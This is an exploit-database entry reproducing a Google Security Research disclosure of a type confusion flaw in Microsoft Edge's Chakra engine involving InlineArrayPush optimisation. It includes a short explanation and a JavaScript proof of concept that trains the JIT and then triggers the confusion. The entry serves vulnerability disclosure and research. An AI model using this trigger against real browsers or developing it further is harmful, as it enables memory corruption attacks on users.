Microsoft Edge Chakra - InlineArrayPush Type Confusion

2019-01-18T00:00:00
ID EXPLOITPACK:3772B86C7DDFEB37BC134407BF7AB065
Type exploitpack
Reporter Google Security Research
Modified 2019-01-18T00:00:00

Description

Microsoft Edge Chakra - InlineArrayPush Type Confusion

                                        
                                            /*
In Chakra, if you add a numeric property to an object having inlined properties, it will start transition to a new type where the space for some of previously inlined properties become for the pointer to the property slots and the pointer to the object array which stores numeric properties. For this reason, when it optimizes an InlineArrayPush instruction which might start transition, it needs to kill corresponding type symbols to prevent type confusion. But it doesn't, so it can lead to type confusion.

PoC:
*/

function opt(a, b) {
    a.b = 2;
    b.push(0);
    a.a = 0x1234;
}

function main() {
    Object.prototype.push = Array.prototype.push;

    for (let i = 0; i < 1000; i++) {
        let a = {a: 1, b: 2};
        opt(a, {});
    }

    let o = {a: 1, b: 2};
    opt(o, o);

    print(o.a);
}

main();